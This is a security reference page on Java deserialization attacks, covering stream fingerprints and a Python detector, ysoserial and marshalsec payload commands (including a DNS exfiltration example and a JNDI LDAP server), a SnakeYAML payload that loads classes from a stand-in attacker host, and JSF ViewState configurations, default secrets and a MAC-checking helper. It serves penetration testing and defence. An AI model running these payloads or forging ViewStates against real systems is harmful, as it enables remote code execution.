Java Deserialization
Java serialization converts a Java object's state into a byte stream that can be stored or transmitted and later reconstructed (deserialized) into an equivalent object. A class opts in by implementing the java.io.Serializable interface, after which its instances can be saved to files, sent over a network, or transferred between JVMs. The risk sits on the receiving side: ObjectInputStream.readObject() instantiates whichever classes the stream names and runs their readObject/readResolve hooks, so an attacker who controls the stream can chain "gadget" classes already on the classpath into code execution without the application ever calling them directly.
Detection
- `"AC ED 00 05"` in Hex
  - `AC ED`: STREAM_MAGIC. Specifies that this is a serialization protocol.
  - `00 05`: STREAM_VERSION. The serialization version.
- `"rO0"` in Base64
- `Content-Type` = "application/x-java-serialized-object"
- `"H4sIAAAAAAAAAJ"` in gzip(base64)
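A small detector that applies the three fingerprints above to a request body or parameter value and, on a hit, parses the stream header. This is an added example, not code from the page or from any of the tools it lists; the sample stream is constructed inline and is exactly what ObjectOutputStream.writeObject("hello") emits (header, TC_STRING, two-byte length, the bytes).

```python
import base64
import binascii
import gzip
import re

# Header every java.io.ObjectOutputStream emits: STREAM_MAGIC (0xACED) then STREAM_VERSION (5).
STREAM_MAGIC = b"\xac\xed"
JAVA_SERIALIZED_CONTENT_TYPE = "application/x-java-serialized-object"

# Type codes that may follow the header (from java.io.ObjectStreamConstants).
TC_NAMES = {
    0x70: "TC_NULL", 0x71: "TC_REFERENCE", 0x72: "TC_CLASSDESC", 0x73: "TC_OBJECT",
    0x74: "TC_STRING", 0x75: "TC_ARRAY", 0x76: "TC_CLASS", 0x77: "TC_BLOCKDATA",
    0x7C: "TC_LONGSTRING", 0x7D: "TC_PROXYCLASSDESC", 0x7E: "TC_ENUM",
}


def _unwrap(blob):
    """Return (stream_bytes, encoding) for a raw, base64 or gzip+base64 stream, else (None, None)."""
    if isinstance(blob, str):
        blob = blob.encode()
    if blob.startswith(STREAM_MAGIC):
        return blob, "raw"
    try:
        decoded = base64.b64decode(re.sub(rb"\s", b"", blob))
    except (binascii.Error, ValueError):
        return None, None
    encoding = "base64"
    if decoded[:2] == b"\x1f\x8b":  # gzip member header, i.e. the "H4sI" case
        try:
            decoded = gzip.decompress(decoded)
        except (OSError, EOFError):
            return None, None
        encoding = "gzip+base64"
    if decoded.startswith(STREAM_MAGIC):
        return decoded, encoding
    return None, None


def detect_java_serialization(blob, content_type=None):
    """Classify a body or parameter value; None when it is not a Java serialization stream."""
    stream, encoding = _unwrap(blob)
    if stream is None or len(stream) < 5:
        return None
    first_tag = stream[4]
    return {
        "encoding": encoding,
        "stream_version": int.from_bytes(stream[2:4], "big"),  # 5 on every JDK since 1.2
        "first_tag": TC_NAMES.get(first_tag, "0x%02x" % first_tag),
        "content_type_match": content_type == JAVA_SERIALIZED_CONTENT_TYPE,
    }


# Constructed sample: exactly what ObjectOutputStream.writeObject("hello") produces.
SAMPLE_RAW = STREAM_MAGIC + b"\x00\x05" + b"\x74" + len(b"hello").to_bytes(2, "big") + b"hello"
SAMPLE_B64 = base64.b64encode(SAMPLE_RAW).decode()                      # starts with "rO0"
SAMPLE_GZ_B64 = base64.b64encode(gzip.compress(SAMPLE_RAW, mtime=0)).decode()  # starts with "H4sI"

if __name__ == "__main__":
    for name, sample in (("raw", SAMPLE_RAW), ("base64", SAMPLE_B64), ("gzip+base64", SAMPLE_GZ_B64)):
        print(name, detect_java_serialization(sample, JAVA_SERIALIZED_CONTENT_TYPE))
    print("html", detect_java_serialization(b"<html><body>hi</body></html>"))
```

When scanning, match only the `H4sI` prefix: the longer `H4sIAAAAAAAAAJ` form reflects the all-zero xfl/os bytes Java's GZIPOutputStream writes, and other gzip producers (Python's included) put different values there. URL-decode parameter values before feeding them in, since `+` and `/` in base64 arrive percent-encoded.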
Tools
Ysoserial
frohoff/ysoserial : A proof-of-concept tool for generating payloads that exploit unsafe Java object deserialization.
```bash
java -jar ysoserial.jar CommonsCollections1 calc.exe > commonpayload.bin
java -jar ysoserial.jar Groovy1 calc.exe > groovypayload.bin
java -jar ysoserial.jar Groovy1 'ping 127.0.0.1' > payload.bin
java -jar ysoserial.jar Jdk7u21 bash -c 'nslookup `uname`.[redacted]' | gzip | base64
```
List of payloads included in ysoserial:
Payload | Authors | Dependencies |
---|---|---|
AspectJWeaver | @Jang | aspectjweaver:1.9.2, commons-collections:3.2.2 |
BeanShell1 | @pwntester, @cschneider4711 | bsh:2.0b5 |
C3P0 | @mbechler | c3p0:0.9.5.2, mchange-commons-java:0.2.11 |
Click1 | @artsploit | click-nodeps:2.3.0, javax.servlet-api:3.1.0 |
Clojure | @JackOfMostTrades | clojure:1.8.0 |
CommonsBeanutils1 | @frohoff | commons-beanutils:1.9.2, commons-collections:3.1, commons-logging:1.2 |
CommonsCollections1 | @frohoff | commons-collections:3.1 |
CommonsCollections2 | @frohoff | commons-collections4:4.0 |
CommonsCollections3 | @frohoff | commons-collections:3.1 |
CommonsCollections4 | @frohoff | commons-collections4:4.0 |
CommonsCollections5 | @matthias_kaiser, @jasinner | commons-collections:3.1 |
CommonsCollections6 | @matthias_kaiser | commons-collections:3.1 |
CommonsCollections7 | @scristalli, @hanyrax, @EdoardoVignati | commons-collections:3.1 |
FileUpload1 | @mbechler | commons-fileupload:1.3.1, commons-io:2.4 |
Groovy1 | @frohoff | groovy:2.3.9 |
Hibernate1 | @mbechler | |
Hibernate2 | @mbechler | |
JBossInterceptors1 | @matthias_kaiser | javassist:3.12.1.GA, jboss-interceptor-core:2.0.0.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21 |
JRMPClient | @mbechler | |
JRMPListener | @mbechler | |
JSON1 | @mbechler | json-libjdk15:2.4, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2, commons-lang:2.6, ezmorph:1.0.6, commons-beanutils:1.9.2, spring-core:4.1.4.RELEASE, commons-collections:3.1 |
JavassistWeld1 | @matthias_kaiser | javassist:3.12.1.GA, weld-core:1.1.33.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21 |
Jdk7u21 | @frohoff | |
Jython1 | @pwntester, @cschneider4711 | jython-standalone:2.5.2 |
MozillaRhino1 | @matthias_kaiser | js:1.7R2 |
MozillaRhino2 | @_tint0 | js:1.7R2 |
Myfaces1 | @mbechler | |
Myfaces2 | @mbechler | |
ROME | @mbechler | rome:1.0 |
Spring1 | @frohoff | spring-core:4.1.4.RELEASE, spring-beans:4.1.4.RELEASE |
Spring2 | @mbechler | spring-core:4.1.4.RELEASE, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2 |
URLDNS | @gebl | |
Vaadin1 | @kai_ullrich | vaadin-server:7.7.14, vaadin-shared:7.7.14 |
Wicket1 | @jacob-baines | wicket-util:6.23.0, slf4j-api:1.6.4 |
Burp extensions
- NetSPI/JavaSerialKiller - Burp extension to perform Java Deserialization Attacks
- federicodotta/Java Deserialization Scanner - All-in-one plugin for Burp Suite for the detection and the exploitation of Java deserialization vulnerabilities
- summitt/burp-ysoserial - YSOSERIAL Integration with Burp Suite
- DirectDefense/SuperSerial - Burp Java Deserialization Vulnerability Identification
- DirectDefense/SuperSerial-Active - Java Deserialization Vulnerability Active Identification Burp Extender
Alternative Tooling
- pwntester/JRE8u20_RCE_Gadget - Pure JRE 8 RCE Deserialization gadget
- joaomatosf/JexBoss - JBoss (and others Java Deserialization Vulnerabilities) verify and EXploitation Tool
- pimps/ysoserial-modified - A fork of the original ysoserial application
- NickstaDB/SerialBrute - Java serialization brute force attack tool
- NickstaDB/SerializationDumper - A tool to dump Java serialization streams in a more human readable form
- bishopfox/gadgetprobe - Exploiting Deserialization to Brute-Force the Remote Classpath
- k3idii/Deserek - Python code to Serialize and Unserialize java binary serialization format.
- mbechler/marshalsec - Java Unmarshaller Security - Turning your data into code execution
```bash
$ java -cp marshalsec.jar marshalsec.<Marshaller> [-a] [-v] [-t] [<gadget_type> [<arguments...>]]
$ java -cp marshalsec.jar marshalsec.JsonIO Groovy "cmd" "/c" "calc"
$ java -cp marshalsec.jar marshalsec.jndi.LDAPRefServer http://localhost:8000#exploit.JNDIExploit 1389
```
- `-a` - generates/tests all payloads for that marshaller
- `-t` - runs in test mode, unmarshalling the generated payloads after generating them.
- `-v` - verbose mode, e.g. also shows the generated payload in test mode.
- `gadget_type` - identifier of a specific gadget; if left out, the available ones for that marshaller are listed.
- `arguments` - gadget-specific arguments
Payload generators for the following marshallers are included:
Marshaller | Gadget Impact |
---|---|
BlazeDSAMF(0\|3\|X) | JDK only escalation to Java serialization, various third party libraries RCEs |
Hessian\|Burlap | various third party RCEs |
Castor | dependency library RCE |
Jackson | possible JDK only RCE, various third party RCEs |
Java | yet another third party RCE |
JsonIO | JDK only RCE |
JYAML | JDK only RCE |
Kryo | third party RCEs |
KryoAltStrategy | JDK only RCE |
Red5AMF(0\|3) | JDK only RCE |
SnakeYAML | JDK only RCEs |
XStream | JDK only RCEs |
YAMLBeans | third party RCE |
YAML Deserialization
SnakeYAML is a popular Java library for parsing and emitting YAML (YAML Ain't Markup Language), a human-readable data serialization standard commonly used for configuration files and data exchange. Its default Constructor honours global `!!` type tags, so Yaml.load() on attacker-controlled input instantiates whatever classes the document names. The classic payload builds a javax.script.ScriptEngineManager over a URLClassLoader: ScriptEngineManager discovers ScriptEngineFactory implementations through ServiceLoader, so the server at http://attacker-ip/ must serve a META-INF/services/javax.script.ScriptEngineFactory file naming a class it also serves (a URL ending in `/` is treated as a directory base, not a JAR); that class's constructor runs the attacker's code. Parsing with new Yaml(new SafeConstructor()) rejects such tags, and SnakeYAML 2.x rejects global tags by default.
```yaml
!!javax.script.ScriptEngineManager [
  !!java.net.URLClassLoader [[
    !!java.net.URL ["http://attacker-ip/"]
  ]]
]
```
ViewState
In Java, ViewState refers to the mechanism used by frameworks like JavaServer Faces (JSF) to maintain the state of UI components between HTTP requests in web applications. There are 2 major implementations:
- Oracle Mojarra (JSF reference implementation)
- Apache MyFaces
Tools:
- joaomatosf/jexboss - JexBoss: Jboss (and Java Deserialization Vulnerabilities) verify and EXploitation Tool
- Synacktiv-contrib/inyourface - InYourFace is a software used to patch unencrypted and unsigned JSF ViewStates.
Encoding
Encoding | Starts with |
---|---|
base64 | rO0 |
base64 + gzip | H4sIAAA |
Storage
The javax.faces.STATE_SAVING_METHOD context parameter in JavaServer Faces (JSF) specifies how the framework saves the state of a component tree (the structure and data of UI components on a page) between HTTP requests: `server` keeps the tree in the session and sends the client only an identifier, `client` ships the serialized tree itself in the javax.faces.ViewState field, where it can be tampered with.
The storage method can also be inferred from the viewstate representation in the HTML body.
- Server side storage: `value="-XXX:-XXXX"`
- Client side storage: base64 + gzip + Java Object
Encryption
By default MyFaces uses DES as encryption algorithm and HMAC-SHA1 to authenticate the ViewState. It is possible and recommended to configure more recent algorithms like AES and HMAC-SHA256.
Encryption Algorithm | HMAC |
---|---|
DES ECB (default) | HMAC-SHA1 |
Supported encryption methods are Blowfish, 3DES (DESede) and AES, selected with the org.apache.myfaces.ALGORITHM context parameter (mode and padding via org.apache.myfaces.ALGORITHM.PARAMETERS). The algorithm, the secrets and the MAC settings are all plain web.xml context parameters, so a readable web.xml, or a configuration copied from a sample, hands an attacker everything needed to forge a ViewState. Look for these clauses:
```xml
<param-name>org.apache.myfaces.MAC_ALGORITHM</param-name>
<param-name>org.apache.myfaces.SECRET</param-name>
<param-name>org.apache.myfaces.MAC_SECRET</param-name>
```
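As an added example (not taken from the page or from the MyFaces project), a web.xml fragment showing the weak configuration an attacker hopes to find next to a hardened one. The weak half spells out the MyFaces defaults and reuses the documentation secrets quoted in the table below (the MAC_SECRET value is taken from the same table for illustration); the hardened half uses placeholder values that must be replaced with freshly generated random keys.

```xml
<!-- WEAK: equivalent to the MyFaces defaults (DES in ECB, HmacSHA1) with secrets
     copied from the documentation. Anyone who has read the docs can forge this ViewState. -->
<context-param>
    <param-name>javax.faces.STATE_SAVING_METHOD</param-name>
    <param-value>client</param-value>
</context-param>
<context-param>
    <param-name>org.apache.myfaces.ALGORITHM</param-name>
    <param-value>DES</param-value>
</context-param>
<context-param>
    <param-name>org.apache.myfaces.ALGORITHM.PARAMETERS</param-name>
    <param-value>ECB/PKCS5Padding</param-value>
</context-param>
<context-param>
    <param-name>org.apache.myfaces.SECRET</param-name>
    <param-value>NzY1NDMyMTA=</param-value>
</context-param>
<context-param>
    <param-name>org.apache.myfaces.MAC_ALGORITHM</param-name>
    <param-value>HmacSHA1</param-value>
</context-param>
<context-param>
    <param-name>org.apache.myfaces.MAC_SECRET</param-name>
    <param-value>NzY1NDMyMTA3NjU0MzIxMA==</param-value>
</context-param>

<!-- HARDENED: keep the tree on the server; if client-side state is unavoidable,
     AES in CBC with a random IV and key, and HmacSHA256 with a separate random key.
     Placeholder values below: generate them with a CSPRNG and base64-encode them. -->
<context-param>
    <param-name>javax.faces.STATE_SAVING_METHOD</param-name>
    <param-value>server</param-value>
</context-param>
<context-param>
    <param-name>org.apache.myfaces.USE_ENCRYPTION</param-name>
    <param-value>true</param-value>
</context-param>
<context-param>
    <param-name>org.apache.myfaces.ALGORITHM</param-name>
    <param-value>AES</param-value>
</context-param>
<context-param>
    <param-name>org.apache.myfaces.ALGORITHM.PARAMETERS</param-name>
    <param-value>CBC/PKCS5Padding</param-value>
</context-param>
<context-param>
    <param-name>org.apache.myfaces.ALGORITHM.IV</param-name>
    <param-value>BASE64_OF_16_RANDOM_BYTES</param-value>
</context-param>
<context-param>
    <param-name>org.apache.myfaces.SECRET</param-name>
    <param-value>BASE64_OF_16_RANDOM_BYTES_FOR_AES_128</param-value>
</context-param>
<context-param>
    <param-name>org.apache.myfaces.MAC_ALGORITHM</param-name>
    <param-value>HmacSHA256</param-value>
</context-param>
<context-param>
    <param-name>org.apache.myfaces.MAC_SECRET</param-name>
    <param-value>BASE64_OF_32_RANDOM_BYTES_DISTINCT_FROM_SECRET</param-value>
</context-param>
```

Even the hardened client-side setting reuses one fixed IV from the configuration for every ViewState, which is all MyFaces offers, so server-side saving remains the stronger choice; the MAC is what actually stops tampering, and it is only as secret as the web.xml it lives in.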
Common secrets from the documentation.
Name | Value |
---|---|
AES CBC/PKCS5Padding | NzY1NDMyMTA3NjU0MzIxMA== |
DES | NzY1NDMyMTA= |
DESede | MDEyMzQ1Njc4OTAxMjM0NTY3ODkwMTIz |
Blowfish | NzY1NDMyMTA3NjU0MzIxMA |
AES CBC | MDEyMzQ1Njc4OTAxMjM0NTY3ODkwMTIz |
AES CBC IV | NzY1NDMyMTA3NjU0MzIxMA== |
- Encryption: Data -> encrypt -> hmac_sha1_sign -> b64_encode -> url_encode -> ViewState
- Decryption: ViewState -> url_decode -> b64_decode -> hmac_sha1_unsign -> decrypt -> Data
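An added triage helper (not the page's code and not part of MyFaces) that classifies a javax.faces.ViewState value by the storage and encoding rules above and, for a MAC'd client-side blob, checks whether the trailing HMAC validates under any of the secrets quoted from the documentation, which is the first thing to try before attempting to recover a key. The cipher step of the pipeline is not implemented here; the sample blob is constructed placeholder bytes signed the way MyFaces does it (HMAC over the ciphertext, appended before base64). Assumption: MAC_SECRET is base64-decoded the same way the SECRET values in the table are.

```python
import base64
import binascii
import hashlib
import hmac
import re
from urllib.parse import unquote

# Secrets quoted on this page from the MyFaces documentation, in the base64 form web.xml carries.
DOC_SECRETS = (
    "NzY1NDMyMTA=",                      # DES
    "NzY1NDMyMTA3NjU0MzIxMA==",          # Blowfish / AES CBC
    "MDEyMzQ1Njc4OTAxMjM0NTY3ODkwMTIz",  # DESede / AES
)

# Mojarra server-side state handle: two (usually negative) integers, e.g. -1234567890:-987654321
SERVER_SIDE_ID = re.compile(r"^-?\d+:-?\d+$")


def classify_viewstate(value):
    """Map a javax.faces.ViewState value to the storage/encoding cases on this page."""
    v = unquote(value).strip()  # the request carries it url-encoded; the HTML body does not
    if SERVER_SIDE_ID.match(v):
        return "server-side id"
    if v.startswith("rO0"):
        return "client-side, unencrypted java object"
    if v.startswith("H4sI"):
        return "client-side, gzip, unencrypted java object"
    try:
        base64.b64decode(v, validate=True)
    except binascii.Error:
        return "unknown"
    return "client-side, encrypted/MAC blob"


def append_mac_trailer(ciphertext, mac_secret_b64, mac_algorithm="sha1"):
    """MyFaces layout: ciphertext || HMAC(ciphertext). With the secret, any ciphertext can be re-signed."""
    key = base64.b64decode(mac_secret_b64)  # assumption: MAC_SECRET is base64-decoded like SECRET
    return ciphertext + hmac.new(key, ciphertext, mac_algorithm).digest()


def verify_mac_trailer(blob, mac_secret_b64, mac_algorithm="sha1"):
    """Split off the trailing HMAC and check it; return the ciphertext on success, else None."""
    key = base64.b64decode(mac_secret_b64)
    size = hashlib.new(mac_algorithm).digest_size
    if len(blob) <= size:
        return None
    body, tag = blob[:-size], blob[-size:]
    expected = hmac.new(key, body, mac_algorithm).digest()
    return body if hmac.compare_digest(tag, expected) else None


def find_doc_mac_secret(viewstate_value, candidates=DOC_SECRETS, mac_algorithm="sha1"):
    """Try the documented secrets as MAC_SECRET; return the one that validates, or None."""
    blob = base64.b64decode(unquote(viewstate_value))
    for secret in candidates:
        if verify_mac_trailer(blob, secret, mac_algorithm) is not None:
            return secret
    return None


# Constructed demo: placeholder "ciphertext" bytes (not real DES output), one signed with a
# documented secret and one with a site-specific key.
DEMO_CIPHERTEXT = bytes(range(24))
DOC_SIGNED_VIEWSTATE = base64.b64encode(append_mac_trailer(DEMO_CIPHERTEXT, DOC_SECRETS[1])).decode()
CUSTOM_SIGNED_VIEWSTATE = base64.b64encode(
    append_mac_trailer(DEMO_CIPHERTEXT, base64.b64encode(b"site-specific-random-key").decode())
).decode()

if __name__ == "__main__":
    print(classify_viewstate("-1234567890:-987654321"))
    print(classify_viewstate("rO0ABXQABWhlbGxv"))
    for vs in (DOC_SIGNED_VIEWSTATE, CUSTOM_SIGNED_VIEWSTATE):
        print(classify_viewstate(vs), "-> documented MAC secret:", find_doc_mac_secret(vs))
```

A value starting with `rO0` or `H4sI` means encryption is off (MyFaces compresses before encrypting, so a gzip prefix cannot appear on an encrypted state): a ysoserial payload, gzipped and base64-encoded, can be substituted directly. A blob that validates under a documented MAC secret is just as forgeable once the matching encryption secret from the same table is used for the cipher step.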